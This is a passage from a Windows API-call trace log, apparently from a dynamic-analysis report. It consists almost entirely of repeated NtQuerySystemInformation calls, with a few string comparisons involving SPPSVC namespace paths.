SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0281.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x40, ResultLength=0x0) [0281.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0281.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0281.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0281.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0281.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf8, Length=0x30, ResultLength=0x0) [0281.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x38, ResultLength=0x0) [0281.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0281.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.191] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0281.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0281.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0281.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0281.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0281.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0281.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0281.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x20, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc740, Length=0x20, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0281.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0281.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0281.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0281.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x40, ResultLength=0x0) [0281.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0281.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcdf0, Length=0x30, ResultLength=0x0) [0281.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf8, Length=0x30, ResultLength=0x0) [0281.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x38, ResultLength=0x0) [0281.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0281.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.206] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0281.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0281.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0281.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0281.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0281.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0281.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0281.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0281.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0281.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0281.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0281.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0281.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0281.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0281.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0281.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0281.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0281.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0281.217] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0281.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0281.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x50, ResultLength=0x0) [0281.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0281.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0281.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0281.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0281.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0281.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0281.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0281.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0281.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x50, ResultLength=0x0) [0281.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x50, ResultLength=0x0) [0281.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x50, ResultLength=0x0) [0281.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0281.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0281.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0281.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x50, ResultLength=0x0) [0281.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.232] NtQuerySystemInformation 